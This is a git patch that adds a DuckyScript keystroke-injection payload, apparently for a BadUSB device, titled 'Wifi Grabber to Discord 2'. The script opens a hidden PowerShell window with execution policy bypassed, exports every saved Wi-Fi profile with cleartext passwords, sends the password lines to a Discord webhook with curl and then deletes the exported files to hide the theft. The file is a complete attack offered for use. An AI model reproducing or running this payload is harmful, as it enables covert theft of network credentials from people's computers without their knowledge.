From 88258e133406f3b793b951ce5229a61b7084cb12 Mon Sep 17 00:00:00 2001 From: beigeworm <93350544+beigeworm@users.noreply.github.com> Date: Sun, 17 Sep 2023 12:05:42 +0100 Subject: [PATCH] Add files via upload --- OSINT/Discord WiFi Grabber 2.txt | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 OSINT/Discord WiFi Grabber 2.txt diff --git a/OSINT/Discord WiFi Grabber 2.txt b/OSINT/Discord WiFi Grabber 2.txt new file mode 100644 index 0000000..e23852b --- /dev/null +++ b/OSINT/Discord WiFi Grabber 2.txt @@ -0,0 +1,22 @@ + +REM Title: Wifi Grabber to Discord 2 +REM Author: @beigeworm +REM Description: Uses Powershell to gather Wifi info and send it via Discord. +REM Target: Windows 10 + +REM *SETUP* +REM replace YOUR_WEBHOOK_HERE with your discord webhook. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM open powershell (remove -W Hidden to show the window) +GUI r +DELAY 750 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass +ENTER +DELAY 4000 + +STRING cd $env:tmp;netsh wlan export profile key=clear;Select-String -Path Wi*.xml -Pattern 'keyMa*' > Wi-Fi;curl.exe -F "f=@Wi-Fi" "YOUR_WEBHOOK_HERE";rm "Wi-*" +DELAY 500 +ENTER